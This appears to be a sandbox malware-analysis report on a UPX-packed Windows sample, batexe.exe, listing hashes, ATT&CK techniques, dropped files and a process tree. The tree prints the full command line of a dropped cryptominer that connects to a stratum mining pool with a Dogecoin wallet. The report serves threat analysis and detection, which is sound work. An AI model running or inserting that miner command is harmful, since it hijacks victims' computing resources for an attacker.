73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
301s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18-02-2024 07:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3984	b2e.exe
5408	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5408	cpuminer-sse2.exe
5408	cpuminer-sse2.exe
5408	cpuminer-sse2.exe
5408	cpuminer-sse2.exe
5408	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3900-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3900 wrote to memory of 3984	3900	batexe.exe	85
PID 3900 wrote to memory of 3984	3900	batexe.exe	85
PID 3900 wrote to memory of 3984	3900	batexe.exe	85
PID 3984 wrote to memory of 4860	3984	b2e.exe	86
PID 3984 wrote to memory of 4860	3984	b2e.exe	86
PID 3984 wrote to memory of 4860	3984	b2e.exe	86
PID 4860 wrote to memory of 5408	4860	cmd.exe	89
PID 4860 wrote to memory of 5408	4860	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3900
- C:\Users\Admin\AppData\Local\Temp\360F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\360F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\360F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\406F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4860
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\360F.tmp\b2e.exe

Filesize
7.5MB

MD5
eb3eed2fffb5131c72c5a4cf13f5dd55

SHA1
0e61e722591e4c2dbf46132960130778b74b6bf8

SHA256
e8fb8faf1951245d5533afe3db3f3748f9130e82bf7a2f757c6b60353e830901

SHA512
bf242cc282816e2315ed9f66e111e8cf751f815fa3d748e60eda89d6e7afa7944844df10e273c4cfc6bc2ced07c19cd3ed5cafa9d6544138ed311742311ff852

Download Submit
C:\Users\Admin\AppData\Local\Temp\360F.tmp\b2e.exe

Filesize
1.8MB

MD5
94b71642b0e285698b549404621b4cd8

SHA1
42c35527bf9afdf4a02e5ccedb980fbf61faca53

SHA256
a281bf5bca134e491e9ffce3f30a1aab0ea5f40172e88720c30df41074415298

SHA512
f66bc86874bf74536907b28cb77b0b237e2b39a10b6c5e9ecae1afd096091e1861fddd1fee68a7eebc5eeda3f82937ab4bb2438d5d78f20d8761ea1995ff08b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\360F.tmp\b2e.exe

Filesize
960KB

MD5
d15ecf39e70d4d6e278b0da9ff36ba87

SHA1
2139694bf96cc3b6fbfadb8a9c8745b8901bff6a

SHA256
04b2e6191d36dccb7b93c7d207ff16c0702cdec9b64b98206f9ffc7dc7633d54

SHA512
326cdd9b35aa3dbd39d2fd4a22dd78f732d481f05ef6dca085cd086d8ca91502f3be961b44e5c4bbf2ebf947ffc4f1b4d4703593951fce22acaa418a77741434

Download Submit
C:\Users\Admin\AppData\Local\Temp\406F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
429KB

MD5
192a0e76a9d60f6833761ad31d1ea6a6

SHA1
00947754d528a3aeb7dd2070080f33ab5dea0b2f

SHA256
0aadcb2525b5a7d1eb4b18a1d36588d3a40671ad5f43b6ed7c2b84b617a05803

SHA512
af2ed0c12f6abc8a7234819b31c8b3d2efb919a3a5117ce2c5e4b4ce62a0d927cadd634fd605e31b50168592a3002795105c5f86d8eb2e751084c9e5907fa16a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
424KB

MD5
b7dd6f151a63b18bbd521626648513f3

SHA1
8c9fe63647c9b8301a510bc92f90198e163c1b18

SHA256
fc15393845fe90dce373adb13e1c3df6ca0f62dbddf9f6928d5581cae368b1c3

SHA512
adc1b3dcf3606b631b5ed87ca3125640b3bd0ebcf425b00c7d2616207a3317660d03cc645eb3b9c5a6dd09d74d12a8540c3742f84718c54f462701e65a208556

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
271KB

MD5
8eac22aa3b06faa709ddeb54e789ba8d

SHA1
cc819c159b93788481614814feb495a7b4cbd4c6

SHA256
25538b44bff14615b6f9384de8e43cc276eab53eb1e8f7d6a98803f620bccc5b

SHA512
f30c85353bfdf672586e799b7b9db14458340895a3f4a5efebfdb0fd10601ab075dda339bfcc1f789139476b312fcc7cc5f1bcbc018e9928e600b5336667e416

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
141KB

MD5
acafc2c6e7c6ed831a2212b4ce31d51a

SHA1
a917aba4085688df74080c0b9d6ac5b4ef8fe60b

SHA256
07d03efb432a35b8352f20498199344165f1fe9ee741d436a329299771ac5d12

SHA512
97b7fe880170d82d8dd4c45c2add6ee9655f602bf6a24a07dce72edd95692af10ac7843b5617000aa05c05eaf78f249f9ab4e7f2bda3c148973d803a8f9b57ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
64KB

MD5
7fcedb6e973c5df3b6652a2afafa6a13

SHA1
116728803559ab58a8127544df80b75a0dd1c6d2

SHA256
fd7191afdecd35b78a0c0ca0457cbbf42ffda1e52263cd785abca5f047b18825

SHA512
05c86bf84079a2cc13dc7a1a917a0839ccd2b18e0440c4bd419c99f65c4161ac69a9447f56bdf6051b2fbbc49b7556fc3717432d0e293dfae2921c0701fe64fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
224KB

MD5
5494fe9d758aac8265d623e0915e2779

SHA1
67516d9c592540a701f0e6a9ef6edad7f4fb2c5e

SHA256
fee842f8ced9027d7e2fa80b52ff2e7092aa2b3b8d71cf66db3890dadd1ba6a4

SHA512
8fd6e7f969de89f92bbee69d8ad214c5e38ec853184c79ab99c7d4434e9a6598fd895f7c0506aad554a6c3b82082a77a4374e519f8a5ee0a671c4c1c26cdfc1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
463KB

MD5
61d4c954198ac74d54d228119609e341

SHA1
76596633184e0130d6d372783981d598fd2148dc

SHA256
c758971e78e2555649f6257f2b25c5687a37b5119e3bb8a5d0a92ddc79a762b4

SHA512
5146a0f9fb8cc2c485a6a768a7df2f76579c35a32ad72e8e6e87199b1d1fe7c57b771051e1be951a8c5fa3cd8dd1207f0cfa6630e32f40ef0be2e15f5e4f1879

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
128KB

MD5
9746d1ac79c8b499d8b2224394581fa7

SHA1
36b1985eabfd8131ad9f2b7f69c903a3fce67629

SHA256
77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

SHA512
61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
64KB

MD5
e98583e2f3157ea2561f40a91a79b195

SHA1
770932f48dbea7a78a3b21e3df65e329a27313ff

SHA256
f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2

SHA512
cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
110KB

MD5
20bc4cc140eabf06d5b1afdcdaf24c92

SHA1
0510816debe29d4bce0a7656f853f65122429f9d

SHA256
08a5f1bb788366d10990593fe159f0480954f804d0f95e2cdfa89dbccdaae175

SHA512
5bdf75ac6cf75c5a440e85ec01d47cd244c559b425fc27255bd06251a59567a8c939956ef9573edfc66e032b3fd366c65660ac1fdb619c40ffe3727f34a873e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
128KB

MD5
8d949f4e279a9a80f50d7c2e0c7bff36

SHA1
92e29300716211895b2d8cd4cf010452f0132152

SHA256
2e87614d15e62262c8b0a0c65e302b15e971b591469f3c679e7e516934cf621f

SHA512
36565dc0a3290ac8c5e0fd0a2756764ce8e49a7ef52a437caad549c7ea1ac3ac7dfe05cd4951ed6b17051768fd9733c94365d85832092c429b0b74ab62a338fb

Download Submit
memory/3900-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3984-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3984-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5408-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-46-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/5408-47-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/5408-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5408-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5408-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5408-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download